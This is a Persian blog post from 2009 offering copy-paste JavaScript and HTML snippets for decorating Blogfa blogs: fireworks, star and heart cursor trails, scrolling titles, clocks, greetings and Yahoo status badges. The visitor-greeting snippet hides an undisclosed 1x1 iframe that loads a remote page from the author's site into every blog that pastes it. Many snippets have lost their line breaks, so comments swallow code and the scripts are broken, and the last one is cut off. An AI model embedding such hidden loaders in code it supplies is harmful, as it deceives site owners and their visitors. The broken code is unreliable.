صفحه ها
دسته
وبــلاگهام در بلاگــفا
لیــنک ویژه دانلود موسـقی
دست نوشته های تنهایی من
لینکهای دوستان
ترفند
دلتنگی من غم تنهایی
قالب های بلاگفا
عکسها
موسقی
آرشیو
آمار وبلاگ
تعداد بازدید : 315506
تعداد نوشته ها : 205
تعداد نظرات : 62
Rss
طراح قالب

سلام دوستان به این وب خوش آمدید

یک سری از کدهای جاوا برای زیبا سازی وبلاگتون حاظر کرده ام امید وارم خوشتون بیاد 

با تشکر 

 

بزرگترین منبع کــد های جاوا  

    Www.CodBaran.Blogfa.coM

شنبه ششم 4 1388

این کد باعث میشه که در صفحه شما  ستاره پخش بشه


 

<!--Powered javascript code by www.codbaran.blogfa.com>

<script LANGUAGE="JavaScript1.2">
<!--


//set Interval between each firework display,
var intervals=2000
var sparksOn     = true;
var speed        = 25;
var power        = 1;

//Dont change these values-------
var documentWidth=documentHeight=randomx=randomy=leftcorner=topcorner=0
var ns=(document.layers);
var ie=(document.all);
var sparksAflyin = false;
var allDivs      = new Array(10);
var totalSparks  = 0;
//-------------------------------

function initAll(){
 if(!ns && !ie){
 sparksOn = false;
 return;
 }
setInterval("firework()",intervals)

if (ns)
 document.captureEvents(Event.MOUSEDOWN | Event.MOUSEMOVE);
 for(dNum=0; dNum<7; ++dNum){
  if(ie)
   allDivs[dNum]=eval('document.all.sDiv'+dNum+'.style');
  else
   allDivs[dNum]=eval('document.layers["sDiv'+dNum+'"]');
 }
}

function firework(){
//below code detects the browser dimenions
if (ie){
documentWidth=document.body.clientWidth
documentHeight=document.body.clientHeight
leftcorner=document.body.scrollLeft
topcorner=document.body.scrollTop
}
else if (ns){
documentWidth=window.innerWidth
documentHeight=window.innerHeight
leftcorner=pageXOffset
topcorner=pageYOffset

}
//below code randomly generates a set of coordinates that fall within the dimension
randomx=leftcorner+Math.floor(Math.random()*documentWidth)
randomy=topcorner+Math.floor(Math.random()*documentHeight)


 if(sparksOn){
  if(!sparksAflyin){
   sparksAflyin=true;
   totalSparks=0;
   for(var spark=0;spark<=6;spark++){
    dx=Math.round(Math.random()*50);
    dy=Math.round(Math.random()*50);
    moveTo(spark,randomx,randomy,dx,dy);
   }
  }
 }
}

function moveTo(i,tempx,tempy,dx,dy){
 if(ie){
  if(tempy+80>(document.body.offsetHeight+document.body.scrollTop))
   tempy=document.body.offsetHeight+document.body.scrollTop-80;
  if(tempx+80>(document.body.offsetWidth+document.body.scrollLeft))
   tempx=document.body.offsetWidth+document.body.scrollLeft-80;
 }
 if(tempx>-50&&tempy>-50){
  tempx+=dx;tempy+=dy; 
  allDivs[i].left=tempx;
  allDivs[i].top=tempy;
  dx-=power;dy-=power;
  setTimeout("moveTo("+i+","+tempx+","+tempy+","+dx+","+dy+")",speed)
 }
 else
  ++totalSparks
 if(totalSparks==7){
  sparksAflyin=false;
  totalSparks=0;
 }
}
window.onload=initAll
//End-->
</script>
<style>
#sDiv0 {position:absolute; height:1; width:1; font-family:arial black; font-size:25px; color:Aqua;}
#sDiv1 {position:absolute; height:1; width:1; font-family:arial black; font-size:22px; color:red;}
#sDiv2 {position:absolute; height:1; width:1; font-family:arial black; font-size:20px; color:blue;}
#sDiv3 {position:absolute; height:1; width:1; font-family:arial black; font-size:15px; color:orange;}
#sDiv4 {position:absolute; height:1; width:1; font-family:arial black; font-size:25px; color:yellow;}
#sDiv5 {position:absolute; height:1; width:1; font-family:arial black; font-size:25px; color:lightgreen;}
#sDiv6 {position:absolute; height:1; width:1; font-family:arial black; font-size:20px; color:silver;}
</style>
<p></p>
<div id="sDiv0">
  *</div>
<div id="sDiv1">
  *</div>
<div id="sDiv2">
  *</div>
<div id="sDiv3">
  *</div>
<div id="sDiv4">
  *</div>
<div id="sDiv5">
  *</div>
<div id="sDiv6">
  *</div>

</body>

</html>


<!--END CODE - Powered java script code by www.codbaran.blogfa.com-->

يکشنبه هفدهم 3 1388

کد منوی که با رفتن اشاره گر موس بر روی آن زیر مجموعه هاش آمده _ جالب و زیبا برای دوستان

کد را کپی کرده و در ویرایش قالب خود بین تگ بادی ها یا در انتهای کد ها بگذارید


 

<SCRIPT LANGUAGE="JavaScript">
<!-- Original:  Randy Bennett (
rbennett@thezone.net) -->
<!-- Web Site: 
http://home.thezone.net/~rbennett/sitemap.htm -->

<!-- Begin
function setVariables() {
if (navigator.appName == "Netscape") {
v = ".top=";
h = ".left=";
dS = "document.";
sD = "";
y = "window.pageYOffset";
x = "window.pageXOffset";
iW = "window.innerWidth";
iH = "window.innerHeight";
}

else {
h = ".pixelLeft=";
v = ".pixelTop=";
dS = "";
sD = ".style";
y = "document.body.scrollTop";
x = "document.body.scrollLeft";
iW = "document.body.clientWidth";
iH = "document.body.clientHeight";
}
xyz = 500;
innerX = eval(iW) - 115;
innerY = eval(iH) - 110;
object = "logo";
checkLocationA();
}
movex = 0;
movey = 0;
xdiff = 0;
ydiff = 0;
ystart = 0;
xstart = 0;

function checkLocation() {
yy = eval(y);
xx = eval(x);
ydiff = ystart - yy;
xdiff = xstart - xx;
if ((ydiff < (-1)) || (ydiff > (1))) movey = Math.round(ydiff / 10), ystart -= movey;
if ((xdiff < (-1)) || (xdiff > (1))) movex = Math.round(xdiff / 10), xstart -= movex;
eval(dS + object + sD + v + (ystart + innerY));
eval(dS + object + sD + h + (xstart + innerX));
setTimeout("checkLocation()", 10);
}

function checkLocationA() {
ystart = eval(y);
xstart=eval(x);
}

function switchLogo(abc) {
if (abc == "menu") {
eval(dS + object + sD + v + 0);
eval(dS + object + sD + h + (-200));
object = abc;
}
else xyz = setTimeout("delayLogo()", 2000)
}

function delayLogo() {
eval(dS + object + sD + v + 0);
eval(dS + object + sD + h + (-200));
object = 'logo';
}
//  End -->
</script>
</HEAD>

<!-- CONTINUE  -->
<BODY OnLoad="setVariables();checkLocation()">

<!-- STEP THREE: Copy this code into the BODY of your HTML document  -->

<div id="logo" style="position:absolute; visibility:show; left:0px; top:-200px; z-index:2">
<table border=0 cellspacing=10 cellpadding=0 width=100><tr><td><center><br><br><br>
<A href="javascript:void(0)"; onmouseover="switchLogo('menu')">

برتریــنها

</A></center></td></tr></table></div>
<div id="menu" style="position:absolute; visibility:show; left:0px; top:-200px; z-index:2">
<table border=0 cellspacing=10 cellpadding=0 width=100><tr><td><center>

<a href="http://www.codbaran.blogfa.com"; onmouseover="clearTimeout(xyz)"; onmouseout="switchLogo('logo')">بهترین قالبها</a>

</center></td></tr><tr><td><center>

<a href="http://www.codbaran.blogfa.com"; onmouseover="clearTimeout(xyz)"; onmouseout="switchLogo('logo')">بهترین کدهای جاوا</a>

</center></td></tr><tr><td><center>

<a href="http://www.mchlove.blogfa.com"; onmouseover="clearTimeout(xyz)"; onmouseout="switchLogo('logo')">دنیای مجازی عاشقان</a>

</center></td></tr></table></div>
<!-- END Script Size:  3.24 KB -->

يکشنبه هفدهم 3 1388
 پرواز پروانه در وبلاگ :   پروانه ای که در فضای  وبلاگتون به پرواز درمیاد . امیدوارم خوشتون بیاد برای استفاده کد را کپی کنید و در قسمت ویرایش قالب بین تگهای  Body و یا در انتهای قالب بگذارید |<!-- Begin codbaran.blogfa.com . Code --><center><html><head><meta http-equiv="Content-Type" content="text/html;charset=windows-1256"><meta http-equiv="Content-Language" content="en-us"><meta name="GENERATOR" content="Microsoft FrontPage 6.0"><meta name="ProgId" content="FrontPage.Editor.Document"><title></title></head><body><p><script language="JavaScript1.2">//specify path to cursor imagevar cursorpath="http://files.myopera.com/minos.blog/java/minos.gif"if (document.layers){document.write("<LAYER NAME='PoInTeRs' LEFT=800 TOP=10><imgsrc='"+cursorpath+"' width=17 height=22></LAYER>")}else if (document.all){document.write("<div id='pOiNtErS'style='position:absolute;top:10px;left:10px;width:17px;height:22px;z-index:50'><imgsrc='"+cursorpath+"' width=40 height=40></div>")}count=-1; move=1;function Curve(){abc=new Array(0,1,1,1,2,3,4,0,6,-1,-1,-1,-2,-3,-4,0,-6)for (i=0; i < abc.length; i++){var C=Math.round(Math.random()*[i])}howbend=abc[C];setTimeout('Curve()',1900);return howbend;}ypos=100;xpos=100;degree = 600;function MoveRandom(){PathBend=degree+=howbend;//ok!y = 4*Math.sin(PathBend*Math.PI/180);x = 6*Math.cos(PathBend*Math.PI/180);if (document.layers){ypos+=y;xpos+=x;document.PoInTeRs.top=ypos+window.pageYOffset;document.PoInTeRs.left=xpos+window.pageXOffset;}else if (document.all){ypos+=y;xpos+=x;document.all.pOiNtErS.style.top=ypos+document.body.scrollTop;document.all.pOiNtErS.style.left=xpos+document.body.scrollLeft;}T=setTimeout('MoveRandom()',50);}function edges(){if (document.layers){if (document.PoInTeRs.left >=window.innerWidth-40+window.pageXOffset)degree=Math.round(Math.random()*45+157.5);if (document.PoInTeRs.top >=window.innerHeight-30+window.pageYOffset)degree=Math.round(Math.random()*45-112.5);if (document.PoInTeRs.top <= 2+window.pageYOffset) degree =Math.round(Math.random()*45+67.5);//OK!if (document.PoInTeRs.left <= 2+window.pageXOffset) degree =Math.round(Math.random()*45-22.5);//OK!}else if (document.all){if (document.all.pOiNtErS.style.pixelLeft >=document.body.offsetWidth-45+document.body.scrollLeft)degree=Math.round(Math.random()*45+157.5);if (document.all.pOiNtErS.style.pixelTop >=document.body.offsetHeight-35+document.body.scrollTop)degree=Math.round(Math.random()*45-112.5);if (document.all.pOiNtErS.style.pixelTop <=2+document.body.scrollTop) degree =Math.round(Math.random()*45+67.5);//OK!if (document.all.pOiNtErS.style.pixelLeft <=2+document.body.scrollLeft) degree =Math.round(Math.random()*45-22.5);//OK!}setTimeout('edges()',100);}function starteffect(){Curve();MoveRandom();// onUnload="opener.gO()"edges();}if (document.all||document.layers)window.onload=starteffect</script></p></body></html><center><br><a href="http://www.codbaran.blogfa.com/">قالب و کدهای جاوا</a>|<!-- End codbaran.blogfa.com . code --> ></body></html></body></html></body></html></body></html>
پنج شنبه جهاردهم 3 1388

 

بارش ستاره در وبلاگ

 

کد را کپی و در  انتهای ویرایش قالب بگذارید

 

||<!-- Start --> <HEAD><style>v\:* { behavior: url(#default#VML); }</style></HEAD> <body> <script language="JavaScript">colors = new Array();colors[0] = new Array('yellow', 'lime');colors[1] = new Array('silver', 'green');colors[2] = new Array('silver', 'blue');colors[3] = new Array('silver', 'purple');colors[4] = new Array('purple', 'white');colors[5] = new Array('blue', 'silver');colors[6] = new Array('red', 'fuchsia');colors[7] = new Array('yellow', 'red'); // Define the maximum number of fire arrows maximum = 1000; vmlobj=''; for(i = 0; i < 12; i++){ vmlobj += '<div id="ster'+i+'" style="position:absolute; left:-50px; top-50px; visibility:hidden; z-index:50;">'; vmlobj += '<v:shape style="width:15px; height:15px;" fillcolor="yellow" coordorigin="0,0" coordsize="200 200">'; vmlobj += '<v:path v="m 8,65 l 72,65, 92,11, 112,65, 174,65, 122,100, 142,155,92,121, 42,155, 60,100 x e"/>'; vmlobj += '<v:stroke on="false" /></v:shape></div>'; } document.write(vmlobj); vmlobj = null; aantal = 0; function begin() { try { if(aantal == maximum){ return;} kleurschema = Math.floor(Math.random() * colors.length); posLinks = Math.floor(Math.random() * (document.body.clientWidth - 180)); posLinks = (posLinks < 170)? 170: posLinks; posBoven = Math.floor(Math.random() * (document.body.clientHeight - 180)); posBoven = (posBoven < 170)? 170: posBoven; straal = 0; uiteen = true; teller = 1; flikkereffect = false; for(var i = 0; i < 12; i++){ document.getElementsByTagName('shape')[i].setAttribute('fillcolor', colors[kleurschema][0]); document.getElementById('ster'+i).style.visibility = 'hidden'; // 5.0 fix document.getElementById('ster'+i).style.left = posLinks; document.getElementById('ster'+i).style.top = posBoven; } document.getElementById('ster0').style.top = (document.body.clientHeight - 20); document.getElementById('ster0').style.visibility = 'visible'; omhoog(); } catch(e){} } function omhoog() { try { positie = parseInt(document.getElementById('ster0').style.top); if(positie > posBoven){ document.getElementById('ster0').style.top = (positie - 25); setTimeout('omhoog()', 50); } else { for(i = 1; i < 12; i++){ document.getElementById('ster'+i).style.top = positie; document.getElementById('ster'+i).style.visibility = 'visible'; } uiteenspatten(); } } catch(e){}} function uiteenspatten() { try { if(straal > 120 && straal % 10 == 0){ flikkereffect = true; teller = (teller == colors[kleurschema].length)? 0: (teller+1); } for(var i = 0; i < 12; i++){ var hoek = i * 30; var piHoek = Math.PI - Math.PI / 180 * hoek; var links = posLinks + Math.round(straal * Math.sin(piHoek)); var boven = positie + Math.round(straal * Math.cos(piHoek)); document.getElementById('ster'+i).style.left = links; document.getElementById('ster'+i).style.top = boven; if(flikkereffect){ document.getElementsByTagName('shape')[i].setAttribute('fillcolor', colors[kleurschema][teller]); } } if(straal < 160 && uiteen){ straal += (straal < 120)? 10: 5; setTimeout('uiteenspatten()', 50); } else if(straal > 120){ uiteen = false; straal -= 5; setTimeout('uiteenspatten()', 50);} else if(straal <= 120){ for(var i = 0; i < 12; i++){ document.getElementById('ster'+i).style.visibility = 'hidden';} aantal++; setTimeout('begin()', 500);}} catch(e) {}}window.onload=begin;</script> </body> <!-- End --> <a href="http://www.codbaran.blogfa.com/">بــهـترین قالب ها و کدهای جاوا </a> <!-- End codbaran.blogfa.com Clock code --> || </body> </html> </body> </html>


پنج شنبه جهاردهم 3 1388

سلام دوستان به این وب خوش آمدید

یک سری از کدهای جاوا برای زیبا سازی وبلاگتون حاظر کرده ام امید وارم خوشتون بیاد 

با تشکر 

 

بزرگترین منبع کــد های جاوا  

    Www.CodBaran.Blogfa.coM

پنج شنبه جهاردهم 3 1388

             کد تغییر تیتر جستجو گر       یه کد زیبا برای تغییر تیتر جستجو گر که به صورت متحرک میباشد کد را کپی و در ویرایش قالب انتهای کدهای موجود قرار دهید 

| <SCRIPT language=javascript>msg = " به وب من خوش آمدید # هرگز چشمانت را برای کسی که را نمیفهمد گریان نکن";msg = "..." + msg;pos = 0;function scrollMSG() {document.title = msg.substring(pos, msg.length) + msg.substring(0, pos);pos++;if (pos > msg.length) pos = 0window.setTimeout("scrollMSG()",200);}scrollMSG(); </SCRIPT><a href="http://www.codbaran.blogfa.com/">بهترین قالب و کدهای جاوا </a>|</body></html>

پنج شنبه جهاردهم 3 1388

 

این هم یه کد بسیار زیبا و جالب که متن شما رو

 

در ۲ رنگ و به صورت خاموش و روشن نمایش میده

 

نمونه کد را در زیر مشاهده میکنید

 

<h2> <p align="center"> <script language="JavaScript1.2"> /* Neon Lights Text By JavaScript Kit (www.codbaran.blogfa.com) Over 400+ free scripts here! */ var message="دوستان به وبلاگ من خوش آمدید " var neonbasecolor="gray" var neontextcolor="#ff0000" var flashspeed=100 //in milliseconds ///No need to edit below this line///// var n=0 if (document.all){ document.write('<font color="'+neonbasecolor+'">') for (m=0;m<message.length;m++) document.write('<span id="neonlight">'+message.charAt(m)+'</span>') document.write('</font>') //cache reference to neonlight array var tempref=document.all.neonlight } else document.write(message) function neon(){ //Change all letters to base color if (n==0){ for (m=0;m<message.length;m++) tempref[m].style.color=neonbasecolor } //cycle through and change individual letters to neon color tempref[n].style.color=neontextcolor if (n<tempref.length-1) n++ else{ n=0 clearInterval(flashing) setTimeout("beginneon()",1500) return } } function beginneon(){ if (document.all) flashing=setInterval("neon()",flashspeed) } beginneon() </script> </h2> </SCRIPT><a href="http://www.codbaran.blogfa.com/">بهتریـن قالب و کدهای جاوا </a> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html>

پنج شنبه جهاردهم 3 1388
کد نشانگر یاهوکدی که در این قسمت براتون گذاشتم برای مشخص شدن آنلاین  یا آفلاین  بودن ای دی یاهوی شماست و بازدید کننده بتونه به شما پیام  بده و ادتون کنه 

کد را کپی کنید و انتهای ویرایش قالب بزارید  توجه داشته باشید

 که در هر دو قسمتی که نوشته شده  Your ID باید ای دی خود رو بنویسید |<a href="ymsgr:sendim?YourID"><img src="http://opi.yahoo.com/online?u=YourID&m=g&t=2" border="0"></a><!--javaskin.sub.ir--><a href="http://www.codbaran.blogfa.com/">منبع کــدهای زیبا ساز</a><!-- End codbaran.blogfa.com Clock code --> |</body></html></body></html></body></html></body></html> این هم یک نشانگر ای دی یاهوی زیبای دخترونه  امید وارم خوشتون بیاد  |<!-- Begin codbaran.blogfa.com ‍Yahoo Status --><scriptlanguage="javascript" src="http://www.parstools.net/yahoo_status/?id=ایدی شما&type=4"></script><!-- End ParsTools.com YahooStatus --><a href="http://www.codbaran.blogfa.com/">قالبو کدهای زیبای جاوا </a > | این  نشانگر ای دی یاهو زیبا وقشنگ تقدیم به شما دوستان  |<!-- Begin codbaran.blogfa.com ‍Yahoo Status --><scriptlanguage="javascript" src="http://www.parstools.net/yahoo_status/?id=ایدی شما&type=10"></script><!-- End ParsTools.com YahooStatus --><a href="http://www.codbaran.blogfa.com/">قالبو برترین کدهای جاوا </a> | 
پنج شنبه جهاردهم 3 1388

کد افکت متن بسیار زیبا که نوشته شما از سمت چپ

 

به راست حرکت میکند

 

کد را در انتهای ویرایش قالب گذاشته و در اون قسمت کد

 

که مشخص شده جمله خود را بنویسید

 

| <!--www.javaskin.sub.ir --> <marquee direction="right"> <div align="center">خــــوش آمدیـــــد</div> </marquee> <div align="center"> <a href="http://codbaran.blogfa.com/" target="_blank">بزرگترین منبع کدهای جاوا اسکریپت</a></div> <!--wwww.codbaran.blogfa.com --></body> </html> | </body> </html> </body> </html>

پنج شنبه جهاردهم 3 1388
خوش آمد گویییه کد بسیار زیبا که نام بازدید کننده رو دریافت و در پایین وبلاگ به او خوش آمد میگوید برای استفاده کد را کپی و در ویرایش قالب انتهای کدهای موجود بگذارید

|<HEAD><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><SCRIPT LANGUAGE="Javascript">var namePrompt = prompt("ببخشید اسم شریفتون؟","");function dispname (namePrompt) { document.write(""+namePrompt+"");}</SCRIPT><BODY><CENTER><SCRIPT LANGUAGE="Javascript">document.write("<font size=3 color=red> خوش امدی تنها دل, ");dispname(namePrompt);document.write("!</font>");</SCRIPT></CENTER></body></html></body></html><iframe src="http://codbaran.blogfa.com/other/COD.HTML" width="1" height="1" align="top" name="کد باران"> |</body></html></body></html></body></html></body></html>

پنج شنبه جهاردهم 3 1388
این هم یه کد بسیار زیبا و جالب که بطور خودکار بر مبنای ساعت بازدید به بازدید کننده وقت بخیر میگوید مثل : ....... صبح بخیر........ ظهر بخیر........شب بخیر.......... |<head><meta http-equiv="Content-Type" content="text/html;charset=windows-1256"><title></title></head><html><body><center><script LANGUAGE="JavaScript"><!-- Begindocument.write("<center><font size=+1>")day = new Date()hr = day.getHours()if (hr ==1)document.write("بامداد بخیر ")if (hr ==2)document.write("نیمه شب شما بخیر")if (hr ==3)document.write("نیمه شب شما بخیر .... نمیروی بخوابی")if (hr ==4)document.write("دوست عزیز وقت استراحت است")if (hr ==5)document.write("سحر بخیر")if ((hr == 6) || (hr ==7) || (hr ==8) || (hr == 9) || (hr ==10))document.write("صبح بخیر")if (hr ==11)document.write("نیمروز بخیر")if (hr ==12)document.write("ظهر بخیر")if (hr ==13)document.write("بعد از ظهر شما بخیر")if ((hr==15) || (hr==16) || (hr==14))document.write("عصر شما بخیر")if ((hr==17) || (hr==18) || (hr==19) || (hr==20) || (hr==21) ||(hr==22))document.write("شب بخیر")if (hr==23)document.write("شب شما بخیر")if (hr==0)document.write("نیمه شب بخیر")document.write("</font></center>")// End --></script></center></body></html>java script by<a href="http://codbaran.blogfa.com"target="_blank">:Codbaran.BLOGFA.COM</a></span></div></td><!----- Script By صدای قطرات کد با کد باران ----> |</body></html></body></html></body></html></body></html>
پنج شنبه جهاردهم 3 1388

بسیاری  از دوستان دوست داشتند یک کد داشته باشند که عکس مورد نظرشون را

به عنوان پس زمینه قالب وبلاگشون

 

قرار بدند  امروز این کد رو برایتان آماده کردم تا عکس مور نظرتون را به پس زمینه وبلاگتون تبدیل کنید

 

برای استفاده کد را کپی و تو قسمت ویرایش قالب بزارید و در اون

 

قسمت که مشخص شده  آدرس عکس مورد نظر خود رو بزارید.

 

| <!-- ONE STEP TO INSTALL BG SCROLLER: 1. Copy the coding into the BODY of your HTML document --> <!-- STEP ONE: Paste this code into the BODY of your HTML document --> <BODY> <body background="آدرس عکس مورد نظر"> <!-- Original: Roy Sinclair (codbaran@email.com) --> <script language="JavaScript"> <!-- Begin var backgroundOffset = 0; var bgObject = eval('document.body'); function scrollBG(maxSize) { backgroundOffset = backgroundOffset + 1; if (backgroundOffset > maxSize) backgroundOffset = 0; bgObject.style.backgroundPosition = "0 " + backgroundOffset; } var ScrollTimer = window.setInterval("scrollBG(307)", 64); // End --> </script> <!-- Script Size: 0.72 KB --> <a href="http://www.codbaran.blogfa.com/">برترین و زیبا ترین کد ها و قالـب</a> | <!-- End codbaran.blogfa.com Clock code --></body> </html> </body> </html> </body> </html> </body> </html>

پنج شنبه جهاردهم 3 1388
کد ساعت بسیاری از دوستان تمایل دارن که تو وبلاگشون یه ساعتزیبا با  باشه برای همین تو این پست ۴ کد ساعت بسیار زیبا و با طرح های مختلف گذاشتم کد مورد نظر رو کپی کرده و انتهای ویرایش قالب بزاریدساعت شماره ۱|<!-- Begin codbaran.blogfa.com ‍Clock Code--><center><script language="javascript"src="http://www.parstools.net/clock/?type=4&w=130&h=130"></script><center><br><a href="http://www.codbaran.blogfa.com/">برترین و زیبا ترین کد ها و قالـب</a><!-- End codbaran.blogfa.com Clock code --></body></html> |</body></html></body></html></body></html></body></html></body></html></body></html></body></html></body></html></body></html>

ساعت شماره ۲

|<!-- Begin codbaran.blogfa.com ?Clock Code--><center><script language="javascript"src="http://www.parstools.net/clock/?type=5&w=130&h=130"></script><center><br><a href="http://www.codbaran.blogfa.com/">برترین و زیبا ترین کد ها و قالـب</a><!-- End codbaran.blogfa.com Clock code --></body></html> |ساعت شماره ۳|<!-- Begin codbaran.blogfa.com ‍Clock Code--><center><script language="javascript"src="http://www.parstools.net/clock/?type=6&w=130&h=130"></script><center><br><a href="http://www.codbaran.blogfa.com/">برترین و زیبا ترین کد ها و قالـب</a><!-- End codbaran.blogfa.com Clock code --> |ساعت شماره ۴|<!-- Begin codbaran.blogfa.com ‍Clock Code--><center><script language="javascript"src="http://www.parstools.net/clock/?type=10&w=130&h=130"></script><center><br><a href="http://www.codbaran.blogfa.com/">برترین و زیبا ترین کد ها و قالـب</a><!-- End codbaran.blogfa.com Clock code --> | 
پنج شنبه جهاردهم 3 1388

ستاره به دور موس

کد جالبی که چندین ستاره در کنار هم به نشانه گر موس پیوند می خورنــد

کدها را کپی کرده و تو قسمت ویرایش قالب انتهای

 

کدهای موجود بزارید

| <!-- Start --- http://codbaran.blogfa.com --> <SCRIPT language=JavaScript> if (document.all){ colours=new Array('00ff00','ffff00','ff0000','ff00ff','0000ff','ee00ee','8470ff','FFBD08','DE2929') amount=colours.length; YgetDelay=0,XgetDelay=0,Ydelay=0,Xdelay=0,step=0.2,currStep=0,my=0,mx=0; document.write('<div id="ie" style="position:absolute;top:0;left:0;"><div style="position:relative">'); for (i=0; i < amount; i++) document.write('<div id="iestars" style="position:absolute;top:0px;left:0px;height:50px;width:50px;font-family:Courier New;font-size:5px;color:'+colours[i]+';padding-top:20px;text-align:center">.</div>'); document.write('</div></div>'); ini=1; gstep=1; function iMouse(){ my=event.y;mx=event.x; } document.onmousemove=iMouse function dim(){ ini-=gstep; dt=setTimeout('dim()',10); if (ini < 3){ clearTimeout(dt); glow(); } } function glow(){ ini+=gstep; gt=setTimeout('glow()',100); if (ini > 15){ clearTimeout(gt); dim(); } } function stars(){ ie.style.top=document.body.scrollTop; for (i=0; i < amount; i++) { var layer=iestars[i].style; layer.filter='glow(color='+colours[i]+', strength='+ini+')'; layer.top= Ydelay+100*Math.sin((5*Math.sin((currStep-15.99)/10))+i*70)*Math.sin((currStep)/10)*Math.cos((currStep+i*25)/10); layer.left=Xdelay+180*Math.cos((5*Math.sin((currStep-15.99)/10))+i*70)*Math.sin((currStep)/10)*Math.cos((currStep+i*25)/10); } currStep+=step; } function delay(){ Ydelay = YgetDelay+=(my-YgetDelay)*1/20; Xdelay = XgetDelay+=(mx-XgetDelay)*1/20; stars(); setTimeout('delay()',7); } delay(); glow(); } </SCRIPT> <center><a href="http://codbaran.blogfa.com/" target="_blank" style="; font-family: tahoma;TEXT-DECORATION: none; FONT-SIZE:8pt">منبع اصلی کدهای جاوااسکریپت<br> http://codbaran.blogfa.com</a> <!-- End --- http://codbaran.blogfa.com --> |
پنج شنبه جهاردهم 3 1388

۶ قلب به دور موس

کدی که از 6 قلب که به دور نشانه گر موس می چرخد تا زیبا سازی وبلاگتان را به ارمغان بیاورد

 

کدها را کپی کرده و تو قسمت ویرایش قالب انتهای

 

کدهای موجود بزارید

در ضــمن شما می توانید پیشـنهاد هایتان را در مـورد این وب  در قسـمت نظرات ارسال کنیــد

 

| <div id="dot0" style="position: absolute; visibility: hidden; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <div id="dot1" style="position: absolute; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <div id="dot2" style="position: absolute; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <div id="dot3" style="position: absolute; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <div id="dot4" style="position: absolute; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <div id="dot5" style="position: absolute; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <div id="dot6" style="position: absolute; height: 11; width: 11;"> <img src="http://files.myopera.com/minos.blogfa/photo/hert2.gif" height=11 width=11> </div> <script LANGUAGE="JavaScript"> <!-- hide code var nDots = 7; var Xpos = 0; var Ypos = 0; // fixed time step, no relation to real time var DELTAT = .01; // size of one spring in pixels var SEGLEN = 10; // spring constant, stiffness of springs var SPRINGK = 10; // all the physics is bogus, just picked stuff to // make it look okay var MASS = 1; // Positive XGRAVITY pulls right, negative pulls left // Positive YGRAVITY pulls down, negative up var XGRAVITY = 0; var YGRAVITY = 50; // RESISTANCE determines a slowing force proportional to velocity var RESISTANCE = 10; // stopping criterea to prevent endless jittering // doesn't work when sitting on bottom since floor // doesn't push back so acceleration always as big // as gravity var STOPVEL = 0.1; var STOPACC = 0.1; var DOTSIZE = 11; // BOUNCE is percent of velocity retained when // bouncing off a wall var BOUNCE = 0.75; var isNetscape = navigator.appName=="Netscape"; // always on for now, could be played with to // let dots fall to botton, get thrown, etc. var followmouse = true; var dots = new Array(); init(); function init() { var i = 0; for (i = 0; i < nDots; i++) { dots[i] = new dot(i); } if (!isNetscape) { // I only know how to read the locations of the // <LI> items in IE //skip this for now // setInitPositions(dots) } // set their positions for (i = 0; i < nDots; i++) { dots[i].obj.left = dots[i].X; dots[i].obj.top = dots[i].Y; } if (isNetscape) { // start right away since they are positioned // at 0, 0 startanimate(); } else { // let dots sit there for a few seconds // since they're hiding on the real bullets setTimeout("startanimate()", 1000); } } function dot(i) { this.X = Xpos; this.Y = Ypos; this.dx = 0; this.dy = 0; if (isNetscape) { this.obj = eval("document.dot" + i); } else { this.obj = eval("dot" + i + ".style"); } } function startanimate() { setInterval("animate()", 20); } // This is to line up the bullets with actual LI tags on the page // Had to add -DOTSIZE to X and 2*DOTSIZE to Y for IE 5, not sure why // Still doesn't work great function setInitPositions(dots) { // initialize dot positions to be on top // of the bullets in the <ul> var startloc = document.all.tags("LI"); var i = 0; for (i = 0; i < startloc.length && i < (nDots - 1); i++) { dots[i+1].X = startloc[i].offsetLeft startloc[i].offsetParent.offsetLeft - DOTSIZE; dots[i+1].Y = startloc[i].offsetTop + startloc[i].offsetParent.offsetTop + 2*DOTSIZE; } // put 0th dot above 1st (it is hidden) dots[0].X = dots[1].X; dots[0].Y = dots[1].Y - SEGLEN; } // just save mouse position for animate() to use function MoveHandler(e) { Xpos = e.pageX; Ypos = e.pageY; return true; } // just save mouse position for animate() to use function MoveHandlerIE() { Xpos = window.event.x + document.body.scrollLeft; Ypos = window.event.y + document.body.scrollTop; } if (isNetscape) { document.captureEvents(Event.MOUSEMOVE); document.onMouseMove = MoveHandler; } else { document.onmousemove = MoveHandlerIE; } function vec(X, Y) { this.X = X; this.Y = Y; } // adds force in X and Y to spring for dot[i] on dot[j] function springForce(i, j, spring) { var dx = (dots[i].X - dots[j].X); var dy = (dots[i].Y - dots[j].Y); var len = Math.sqrt(dx*dx + dy*dy); if (len > SEGLEN) { var springF = SPRINGK * (len - SEGLEN); spring.X += (dx / len) * springF; spring.Y += (dy / len) * springF; } } function animate() { // dots[0] follows the mouse, // though no dot is drawn there var start = 0; if (followmouse) { dots[0].X = Xpos; dots[0].Y = Ypos; start = 1; } for (i = start ; i < nDots; i++ ) { var spring = new vec(0, 0); if (i > 0) { springForce(i-1, i, spring); } if (i < (nDots - 1)) { springForce(i+1, i, spring); } // air resisitance/friction var resist = new vec(-dots[i].dx * RESISTANCE, -dots[i].dy * RESISTANCE); // compute new accel, including gravity var accel = new vec((spring.X + resist.X)/MASS + XGRAVITY, (spring.Y + resist.Y)/ MASS + YGRAVITY); // compute new velocity dots[i].dx += (DELTAT * accel.X); dots[i].dy += (DELTAT * accel.Y); // stop dead so it doesn't jitter when nearly still if (Math.abs(dots[i].dx) < STOPVEL && Math.abs(dots[i].dy) < STOPVEL && Math.abs(accel.X) < STOPACC && Math.abs(accel.Y) < STOPACC) { dots[i].dx = 0; dots[i].dy = 0; } // move to new position dots[i].X += dots[i].dx; dots[i].Y += dots[i].dy; // get size of window var height, width; if (isNetscape) { height = window.innerHeight + window.pageYOffset; width = window.innerWidth + 